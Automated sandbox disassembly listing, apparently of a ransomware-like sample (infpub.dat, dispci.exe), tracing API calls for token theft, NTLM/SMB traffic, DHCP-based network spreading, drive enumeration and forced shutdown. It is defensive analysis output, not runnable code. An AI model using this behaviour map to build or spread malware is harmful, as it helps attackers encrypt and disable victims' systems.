Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00475507, Relevance: 4.5, APIs: 3, Instructions: 29

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,004762C3,?), ref: 00475520
GetLastError.KERNEL32(?,004762C3,?), ref: 00475528
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,004762C3,?), ref: 0047553E

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00471747, Relevance: 70.4, APIs: 38, Strings: 2, Instructions: 424

APIs

GetProcessHeap.KERNEL32(00000008,?,00000000,002F16E0,00000000,00471C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 00471783
HeapAlloc.KERNEL32(00000000), ref: 0047178C
CharUpperW.USER32(00000000), ref: 004717B2
GetProcessHeap.KERNEL32(00000008,00000086), ref: 004717DA
HeapAlloc.KERNEL32(00000000), ref: 004717DD
htons.WS2_32(00000082), ref: 00471801
send.WS2_32(00000086,?,00000086,00000041), ref: 00471863
recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 0047187F
GetProcessHeap.KERNEL32(00000008,00000018), ref: 004718F4
HeapAlloc.KERNEL32(00000000), ref: 004718FD

Part of subcall function 004715A7: GetProcessHeap.KERNEL32(00000008,00000010,773E29EE,?,757DFE8D), ref: 004715D9
Part of subcall function 004715A7: HeapAlloc.KERNEL32(00000000), ref: 004715E2
Part of subcall function 004715A7: CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000008), ref: 00471603
Part of subcall function 004715A7: GetProcessHeap.KERNEL32(00000008,00000020), ref: 00471633
Part of subcall function 004715A7: HeapAlloc.KERNEL32(00000000), ref: 00471636
Part of subcall function 004715A7: CryptImportKey.ADVAPI32(?,00000000,00000020,00000000,00000100,?), ref: 0047166E
Part of subcall function 004715A7: CryptCreateHash.ADVAPI32(?,00008009,?,00000000,?), ref: 00471688
Part of subcall function 004715A7: CryptSetHashParam.ADVAPI32(?,00000005,00008003,00000000), ref: 0047169C
Part of subcall function 004715A7: GetProcessHeap.KERNEL32(00000008,00000000), ref: 004716AD
Part of subcall function 004715A7: HeapFree.KERNEL32(00000000), ref: 004716B4
Part of subcall function 004715A7: CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,?), ref: 004716CA
Part of subcall function 004715A7: CryptHashData.ADVAPI32(?,?,000000FF,00000000), ref: 004716E8
Part of subcall function 004715A7: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00471701
Part of subcall function 004715A7: CryptDestroyHash.ADVAPI32(?), ref: 0047171A
Part of subcall function 004715A7: CryptDestroyKey.ADVAPI32(?), ref: 00471728
Part of subcall function 004715A7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00471737

GetProcessHeap.KERNEL32(00000008,00000010,?,00000000,?,00008003,00008003,?,?,00000000,?,00008002), ref: 00471958
HeapAlloc.KERNEL32(00000000), ref: 0047195B
rand.MSVCRT ref: 00471983
GetProcessHeap.KERNEL32(00000008,00000018,?,00000010,?,?,00008003), ref: 004719B8
HeapAlloc.KERNEL32(00000000), ref: 004719BB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00471A13
HeapAlloc.KERNEL32(00000000), ref: 00471A16
htons.WS2_32(-000000FC), ref: 00471A39
memcpy.MSVCRT ref: 00471B48
send.WS2_32(?,00000000,00000000,00000000), ref: 00471B7A
recv.WS2_32(?,?,0000FFFF,00000000), ref: 00471B93
memset.MSVCRT ref: 00471BAB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00471BB6
HeapFree.KERNEL32(00000000), ref: 00471BBD
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00471BC8
HeapFree.KERNEL32(00000000), ref: 00471BCF
GetProcessHeap.KERNEL32(00000008,?), ref: 00471BE3
HeapFree.KERNEL32(00000000), ref: 00471BE6
GetProcessHeap.KERNEL32(00000008,?,?,00000010,?,?,00008003), ref: 00471BF1
HeapFree.KERNEL32(00000000), ref: 00471BF4
GetProcessHeap.KERNEL32(00000008,?), ref: 00471BFF
HeapFree.KERNEL32(00000000), ref: 00471C02
GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,00008002), ref: 00471C0D
HeapFree.KERNEL32(00000000), ref: 00471C10
GetProcessHeap.KERNEL32(00000008,?), ref: 00471C19
HeapFree.KERNEL32(00000000), ref: 00471C1C
GetProcessHeap.KERNEL32(00000008,?), ref: 00471C27
HeapFree.KERNEL32(00000000), ref: 00471C2A

Strings

NTLM, xrefs: 00471AB9
SSP, xrefs: 00471AC0

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00472497, Relevance: 39.2, APIs: 26, Instructions: 199

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,0047471C,?,?,?,?,?), ref: 004724AF
HeapAlloc.KERNEL32(00000000,?,?,?,0047471C,?,?,?,?,?), ref: 004724B8
GetProcessHeap.KERNEL32(00000008,00001124,757DFE8D,?,?,?,0047471C,?,?,?,?,?), ref: 004724CD
HeapAlloc.KERNEL32(00000000,?,?,?,0047471C,?,?,?,?,?), ref: 004724D0
rand.MSVCRT ref: 004724E1
htons.WS2_32(00001120), ref: 004724FF
rand.MSVCRT ref: 0047255F
GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,0047471C,?,?,?,?,?), ref: 00472576
HeapAlloc.KERNEL32(00000000,?,?,?,0047471C,?,?,?,?,?), ref: 0047257D
htons.WS2_32(0000015C), ref: 0047259F
rand.MSVCRT ref: 004725CD
GetProcessHeap.KERNEL32(00000008,00001284,?,?,?,0047471C,?,?,?,?,?), ref: 004725E4
HeapAlloc.KERNEL32(00000000,?,?,?,0047471C,?,?,?,?,?), ref: 004725EB
memcpy.MSVCRT ref: 00472605
memcpy.MSVCRT ref: 00472617
send.WS2_32(?,00000000,0000111C,00000000), ref: 00472630
send.WS2_32(?,?,00000168,00000000), ref: 0047264D
recv.WS2_32(?,?,0000FFFF,00000000), ref: 00472697
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0047471C,?,?,?,?,?), ref: 004726BF
HeapFree.KERNEL32(00000000), ref: 004726C6
GetProcessHeap.KERNEL32(00000008,?,?,?,?,0047471C,?,?,?,?,?), ref: 004726CF
HeapFree.KERNEL32(00000000), ref: 004726D6
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,0047471C,?,?,?,?,?), ref: 004726DF
HeapFree.KERNEL32(00000000), ref: 004726E6
GetProcessHeap.KERNEL32(00000008,?,?,?,?,0047471C,?,?,?,?,?), ref: 004726F1
HeapFree.KERNEL32(00000000), ref: 004726F8

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004779D7, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 237

APIs

Part of subcall function 00477897: GetTickCount.KERNEL32(?,?,?,004779E8), ref: 004778AF
Part of subcall function 00477897: srand.MSVCRT ref: 004778B2
Part of subcall function 00477897: GetTickCount.KERNEL32(?,?,004779E8), ref: 004778B9
Part of subcall function 00477897: GetModuleFileNameW.KERNEL32(C:\Windows\infpub.dat,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,004779E8), ref: 00477926

Part of subcall function 00477F04: GetComputerNameW.KERNEL32(?,?), ref: 00477F3B
Part of subcall function 00477F04: wsprintfW.USER32 ref: 00477F7F
Part of subcall function 00477F04: CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 00477F8E
Part of subcall function 00477F04: GetLastError.KERNEL32 ref: 00477F99
Part of subcall function 00477F04: GetLastError.KERNEL32 ref: 00477FAB

ExitProcess.KERNEL32 ref: 00477A07
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00477CB3

Part of subcall function 00477E8E: PathFileExistsW.SHLWAPI(?), ref: 00477EB1
Part of subcall function 00477E8E: GetCurrentProcess.KERNEL32(?,?), ref: 00477EC3
Part of subcall function 00477E8E: ExitProcess.KERNEL32 ref: 00477EFD

Part of subcall function 004784EE: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004784FC
Part of subcall function 004784EE: Process32FirstW.KERNEL32(00000000,?), ref: 0047851B
Part of subcall function 004784EE: Process32NextW.KERNEL32(00000000,0000022C), ref: 0047853E
Part of subcall function 004784EE: CloseHandle.KERNEL32(00000000), ref: 00478556

Part of subcall function 004710A7: ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000104), ref: 004710DD
Part of subcall function 004710A7: PathAppendW.SHLWAPI(?,dispci.exe), ref: 0047119F
Part of subcall function 004710A7: GetProcessHeap.KERNEL32(00000000,?), ref: 004711DC
Part of subcall function 004710A7: HeapFree.KERNEL32(00000000), ref: 004711E3

WSAStartup.WS2_32(00000202,004881E0), ref: 00477A3D

Part of subcall function 00476C5F: GetProcessHeap.KERNEL32(00000008,00000034,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C6F
Part of subcall function 00476C5F: HeapAlloc.KERNEL32(00000000,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C78
Part of subcall function 00476C5F: InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C81
Part of subcall function 00476C5F: GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476CAC
Part of subcall function 00476C5F: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476CAF

InitializeCriticalSection.KERNEL32(00487B9C,00000008,004767F9,0047682F,000000FF,00000024,00476AA8,00000000,0000FFFF), ref: 00477A80

Part of subcall function 0047652F: CommandLineToArgvW.SHELL32(?,?), ref: 00476566
Part of subcall function 0047652F: StrToIntW.SHLWAPI(00000000), ref: 00476581
Part of subcall function 0047652F: StrStrW.SHLWAPI(00000000,00481580), ref: 004765B3
Part of subcall function 0047652F: StrStrW.SHLWAPI(00000000,00481588), ref: 004765CD
Part of subcall function 0047652F: StrChrW.SHLWAPI(00000000,0000003A), ref: 004765DF
Part of subcall function 0047652F: LocalFree.KERNEL32(00000000,?,?,?,?,00477A8E,?), ref: 00476607

Part of subcall function 00477DD0: NetServerGetInfo.NETAPI32(00000000,00000065,?,?,?,00000000,?,?,00477AA3,?,?,000000FF,?,?), ref: 00477DF6
Part of subcall function 00477DD0: NetApiBufferFree.NETAPI32(?,?,?,00000000,?,?,00477AA3,?,?,000000FF,?,?), ref: 00477E0F

Part of subcall function 00478192: GetLocalTime.KERNEL32(?,00000000), ref: 004781AF
Part of subcall function 00478192: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 004781F2
Part of subcall function 00478192: PathAppendW.SHLWAPI(?,?), ref: 004782AF
Part of subcall function 00478192: wsprintfW.USER32 ref: 004782CE

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000000FF,?,?), ref: 00477AAD
CreateThread.KERNEL32(00000000,00000000,00478A6F,00000000,00000000,00000000), ref: 00477AC6
CreateThread.KERNEL32(00000000,00000000,004777D1,00000000,00000000,00000000), ref: 00477ADF

Part of subcall function 00476CC8: EnterCriticalSection.KERNEL32(002F16E0,00477B03), ref: 00476CCD
Part of subcall function 00476CC8: InterlockedExchange.KERNEL32(002F1708,00000001), ref: 00476CD9
Part of subcall function 00476CC8: LeaveCriticalSection.KERNEL32(002F16E0), ref: 00476CE0

Sleep.KERNELBASE(?,000000FF), ref: 00477B93

Part of subcall function 004785FB: memset.MSVCRT ref: 0047862D
Part of subcall function 004785FB: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00478645
Part of subcall function 004785FB: Process32FirstW.KERNEL32 ref: 00478666
Part of subcall function 004785FB: OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 004786A0
Part of subcall function 004785FB: OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 004786B9
Part of subcall function 004785FB: GetTokenInformation.ADVAPI32(000000FF,0000000C,?,00000004,?), ref: 004786DF
Part of subcall function 004785FB: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 00478708
Part of subcall function 004785FB: memset.MSVCRT ref: 0047871E
Part of subcall function 004785FB: GetTokenInformation.ADVAPI32(?,0000000A,?,00000038,?,?,00000000,?), ref: 00478738
Part of subcall function 004785FB: SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 00478767
Part of subcall function 004785FB: CloseHandle.KERNEL32(?), ref: 004787A2
Part of subcall function 004785FB: CloseHandle.KERNEL32(?), ref: 004787A8
Part of subcall function 004785FB: Process32NextW.KERNEL32(?,?), ref: 004787BA
Part of subcall function 004785FB: GetLastError.KERNEL32 ref: 004787CA
Part of subcall function 004785FB: CloseHandle.KERNEL32(?), ref: 004787D4

Part of subcall function 0047A3B1: CreateThread.KERNEL32(00000000,00000000,0047A016,00000000,00000004,00000000), ref: 0047A3C9
Part of subcall function 0047A3B1: SetThreadToken.ADVAPI32(?,?,?,?,00477B43,?,?,00000004,0047787C,00000000,000000FF), ref: 0047A3DD
Part of subcall function 0047A3B1: ResumeThread.KERNEL32(?,?,?,00477B43,?,?,00000004,0047787C,00000000,000000FF), ref: 0047A3EA
Part of subcall function 0047A3B1: GetLastError.KERNEL32(?,?,00477B43,?,?,00000004,0047787C,00000000,000000FF), ref: 0047A3F7
Part of subcall function 0047A3B1: CloseHandle.KERNEL32(?), ref: 0047A402
Part of subcall function 0047A3B1: SetLastError.KERNEL32(00000057,?,?,00477B43,?,?,00000004,0047787C,00000000,000000FF), ref: 0047A411

Part of subcall function 0047796E: CreateThread.KERNEL32(00000000,00000000,00477957,00000000,00000004,00000000), ref: 00477988
Part of subcall function 0047796E: SetThreadToken.ADVAPI32(?,00000000,?,?,?,00477B4A,?,?,?,00000004,0047787C,00000000,000000FF), ref: 0047799C
Part of subcall function 0047796E: ResumeThread.KERNEL32(?,?,?,?,00477B4A,?,?,?,00000004,0047787C,00000000,000000FF), ref: 004779A9
Part of subcall function 0047796E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004779B9
Part of subcall function 0047796E: GetLastError.KERNEL32(?,?,?,00477B4A,?,?,?,00000004,0047787C,00000000,000000FF), ref: 004779C1
Part of subcall function 0047796E: CloseHandle.KERNEL32(?), ref: 004779CA

Part of subcall function 00477146: GetCurrentProcess.KERNEL32(?,?,00000000,?,00477AF8), ref: 00477164
Part of subcall function 00477146: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,00000000,?,00477AF8), ref: 004771AA
Part of subcall function 00477146: CoCreateGuid.OLE32(?), ref: 004771C8
Part of subcall function 00477146: StringFromCLSID.OLE32(?,?), ref: 004771E1
Part of subcall function 00477146: wsprintfW.USER32 ref: 0047721F
Part of subcall function 00477146: CreateThread.KERNEL32(00000000,00000000,00476FFE,?,00000000,00000000), ref: 00477236
Part of subcall function 00477146: memset.MSVCRT ref: 00477259
Part of subcall function 00477146: wsprintfW.USER32 ref: 00477281
Part of subcall function 00477146: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004772A6
Part of subcall function 00477146: WaitForSingleObject.KERNEL32(?,0000EA60), ref: 004772B8
Part of subcall function 00477146: TerminateThread.KERNELBASE(?,00000000), ref: 004772CD
Part of subcall function 00477146: CloseHandle.KERNEL32(?), ref: 004772D6
Part of subcall function 00477146: DeleteFileW.KERNELBASE(?,?,?), ref: 00477306
Part of subcall function 00477146: CoTaskMemFree.OLE32(?), ref: 0047730F
Part of subcall function 00477146: GetProcessHeap.KERNEL32(00000000,?,?,00477AF8), ref: 0047732C
Part of subcall function 00477146: HeapFree.KERNEL32(00000000,?,00477AF8), ref: 00477333

Part of subcall function 00476E66: EnterCriticalSection.KERNEL32(?,002F16E0,757DC570,757DFE8D,?,?,00476A84,002F16E0,?,?), ref: 00476E87
Part of subcall function 00476E66: GetProcessHeap.KERNEL32(00000008,00000008,002F16E0,00000000,?,?,00476A84,002F16E0,?,?), ref: 00476EB8
Part of subcall function 00476E66: HeapAlloc.KERNEL32(00000000,?,?,00476A84,002F16E0,?,?), ref: 00476EC1
Part of subcall function 00476E66: GetProcessHeap.KERNEL32(00000008,?,?,?,00476A84,002F16E0,?,?), ref: 00476ED9
Part of subcall function 00476E66: HeapAlloc.KERNEL32(00000000,?,?,00476A84,002F16E0,?,?), ref: 00476EDC
Part of subcall function 00476E66: memcpy.MSVCRT ref: 00476F0D
Part of subcall function 00476E66: GetProcessHeap.KERNEL32(00000000,?,?,?,00476A84,002F16E0,?,?), ref: 00476F26
Part of subcall function 00476E66: HeapFree.KERNEL32(00000000), ref: 00476F29
Part of subcall function 00476E66: GetProcessHeap.KERNEL32(00000008,?,?,002F16E0,00000000,?,?,00476A84,002F16E0,?,?), ref: 00476F41
Part of subcall function 00476E66: HeapReAlloc.KERNEL32(00000000,?,?,00476A84,002F16E0,?,?), ref: 00476F48
Part of subcall function 00476E66: LeaveCriticalSection.KERNEL32(?,002F16E0,00000000,?,?,00476A84,002F16E0,?,?), ref: 00476F6C

CreateThread.KERNEL32(00000000,00000000,0047A1A9,00000000,00000000,00000000), ref: 00477B78

Part of subcall function 0047A420: GetProcessHeap.KERNEL32(00000008,00000004,757DDE72,00000000,00000000,?,?,00477B89,000000FF), ref: 0047A436
Part of subcall function 0047A420: HeapAlloc.KERNEL32(00000000,?,?,00477B89,000000FF), ref: 0047A439
Part of subcall function 0047A420: CreateThread.KERNEL32(00000000,00000000,0047A333,00000000,00000000,00000000), ref: 0047A454
Part of subcall function 0047A420: GetProcessHeap.KERNEL32(00000000,00000000,?,?,00477B89,000000FF), ref: 0047A463
Part of subcall function 0047A420: HeapFree.KERNEL32(00000000), ref: 0047A466

ExitProcess.KERNEL32 ref: 00477CBA

Part of subcall function 0047554A: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,0047790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 00475561
Part of subcall function 0047554A: GetLastError.KERNEL32(?,?,?,0047790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,004779E8), ref: 0047556B
Part of subcall function 0047554A: CryptGenRandom.ADVAPI32(?,?,?,?,?,?,0047790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,004779E8), ref: 00475581
Part of subcall function 0047554A: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,0047790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,004779E8), ref: 0047558E

Part of subcall function 0047636B: GetLogicalDrives.KERNEL32 ref: 0047637A
Part of subcall function 0047636B: GetDriveTypeW.KERNELBASE(?), ref: 004763B8
Part of subcall function 0047636B: LocalAlloc.KERNEL32(00000040,00000050), ref: 004763C7
Part of subcall function 0047636B: CreateThread.KERNEL32(00000000,00000000,00476299,00000000,00000000,00000000), ref: 00476404

Sleep.KERNELBASE(?), ref: 00477BEB

Part of subcall function 00478A23: InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 00478A54
Part of subcall function 00478A23: ExitWindowsEx.USER32(00000006,00000000), ref: 00478A61
Part of subcall function 00478A23: ExitProcess.KERNEL32 ref: 00478A68

GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00477C0E
lstrcatW.KERNEL32(?,\rundll32.exe), ref: 00477C28
GetModuleFileNameW.KERNEL32(C:\Windows\infpub.dat,0000030C), ref: 00477C43
PathFindFileNameW.SHLWAPI(C:\Windows\infpub.dat), ref: 00477C51
wsprintfW.USER32 ref: 00477C6B

Part of subcall function 0047923F: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,004779FC,?,?,?), ref: 0047927B
Part of subcall function 0047923F: memcpy.MSVCRT ref: 00479294
Part of subcall function 0047923F: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 00479303
Part of subcall function 0047923F: VirtualFree.KERNEL32(00000000,?,00004000), ref: 00479323

Strings

\rundll32.exe, xrefs: 00477C1C
C:\Windows\infpub.dat, xrefs: 00477C37, 00477C3C, 00477C50
%ws C:\Windows\%ws,#1 %ws, xrefs: 00477C65

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00478B2E, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 158

APIs

memset.MSVCRT ref: 00478B52
memset.MSVCRT ref: 00478B6F
GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00478B8F
LocalAlloc.KERNEL32(00000040,?), ref: 00478BA0
GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00478BBA
inet_addr.WS2_32(000001B0), ref: 00478BDF
inet_addr.WS2_32(000001C0), ref: 00478BF3

Part of subcall function 0047641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,774E2D57,?,757DC426), ref: 00476439
Part of subcall function 0047641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00476446
Part of subcall function 0047641A: HeapAlloc.KERNEL32(00000000), ref: 0047644D
Part of subcall function 0047641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 00476465

GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 00478C24
HeapFree.KERNEL32(00000000), ref: 00478C2B
GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 00478C5C
HeapFree.KERNEL32(00000000), ref: 00478C63

Part of subcall function 00477D4E: NetServerGetInfo.NETAPI32(00000000,00000065,?,73349263,?,?,00478C7C), ref: 00477D5F
Part of subcall function 00477D4E: NetApiBufferFree.NETAPI32(?,?,?,00478C7C), ref: 00477D82

CloseHandle.KERNEL32(?), ref: 00478D17

Part of subcall function 00478D39: GetComputerNameExW.KERNEL32(00000004,?,?,00000000,73349263,00000000), ref: 00478D80
Part of subcall function 00478D39: DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 00478DA2
Part of subcall function 00478D39: DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 00478DCE
Part of subcall function 00478D39: DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 00478E07
Part of subcall function 00478D39: htonl.WS2_32(00000000), ref: 00478E36
Part of subcall function 00478D39: htonl.WS2_32(00000000), ref: 00478E44
Part of subcall function 00478D39: inet_ntoa.WS2_32(00000000), ref: 00478E47
Part of subcall function 00478D39: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 00478E65
Part of subcall function 00478D39: HeapFree.KERNEL32(00000000), ref: 00478E6C
Part of subcall function 00478D39: DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 00478E81
Part of subcall function 00478D39: DhcpRpcFreeMemory.DHCPSAPI(?), ref: 00478E9A

LocalAlloc.KERNEL32(00000040,0000000C), ref: 00478C98
inet_addr.WS2_32(255.255.255.255), ref: 00478CA9
htonl.WS2_32(?), ref: 00478CD0
htonl.WS2_32(?), ref: 00478CD8
CreateThread.KERNEL32(00000000,00000000,Function_00008AB3,00000000,00000000,00000000), ref: 00478CED
LocalFree.KERNEL32(?), ref: 00478D28

Strings

255.255.255.255, xrefs: 00478CA4

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00477146, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 172

APIs

GetCurrentProcess.KERNEL32(?,?,00000000,?,00477AF8), ref: 00477164

Part of subcall function 00476F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,00477170,00000000,?,00477AF8), ref: 00476F8E
Part of subcall function 00476F7C: GetProcAddress.KERNEL32(00000000,?,?,00477170,00000000,?,00477AF8), ref: 00476F95
Part of subcall function 00476F7C: IsWow64Process.KERNELBASE(?,00000000,?,?,00477170,00000000,?,00477AF8), ref: 00476FA6

Part of subcall function 00478313: FindResourceW.KERNEL32(?,00000006,00000000), ref: 0047832A
Part of subcall function 00478313: LoadResource.KERNEL32(00000000), ref: 00478341
Part of subcall function 00478313: LockResource.KERNEL32(00000000), ref: 00478350
Part of subcall function 00478313: SizeofResource.KERNEL32(00000000), ref: 00478368
Part of subcall function 00478313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 00478384
Part of subcall function 00478313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0047838D
Part of subcall function 00478313: memcpy.MSVCRT ref: 0047839C
Part of subcall function 00478313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 004783B9
Part of subcall function 00478313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 004783BC
Part of subcall function 00478313: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,?,?,00000002), ref: 004783FE
Part of subcall function 00478313: HeapFree.KERNEL32(00000000), ref: 00478401
Part of subcall function 00478313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 0047840A
Part of subcall function 00478313: HeapFree.KERNEL32(00000000), ref: 0047840D

GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,00000000,?,00477AF8), ref: 004771AA
CoCreateGuid.OLE32(?), ref: 004771C8
StringFromCLSID.OLE32(?,?), ref: 004771E1

Part of subcall function 00476FAF: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00476FC5
Part of subcall function 00476FAF: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00476FDF
Part of subcall function 00476FAF: CloseHandle.KERNEL32(00000000), ref: 00476FF0

wsprintfW.USER32 ref: 0047721F
CreateThread.KERNEL32(00000000,00000000,00476FFE,?,00000000,00000000), ref: 00477236
memset.MSVCRT ref: 00477259
wsprintfW.USER32 ref: 00477281
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004772A6
WaitForSingleObject.KERNEL32(?,0000EA60), ref: 004772B8

Part of subcall function 00476CC8: EnterCriticalSection.KERNEL32(002F16E0,00477B03), ref: 00476CCD
Part of subcall function 00476CC8: InterlockedExchange.KERNEL32(002F1708,00000001), ref: 00476CD9
Part of subcall function 00476CC8: LeaveCriticalSection.KERNEL32(002F16E0), ref: 00476CE0

TerminateThread.KERNELBASE(?,00000000), ref: 004772CD
CloseHandle.KERNEL32(?), ref: 004772D6
DeleteFileW.KERNELBASE(?,?,?), ref: 00477306
CoTaskMemFree.OLE32(?), ref: 0047730F
GetProcessHeap.KERNEL32(00000000,?,?,00477AF8), ref: 0047732C
HeapFree.KERNEL32(00000000,?,00477AF8), ref: 00477333

Strings

\\.\pipe\%ws, xrefs: 00477219
"%ws" %ws, xrefs: 00477278

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004721DC, Relevance: 28.6, APIs: 19, Instructions: 129

APIs

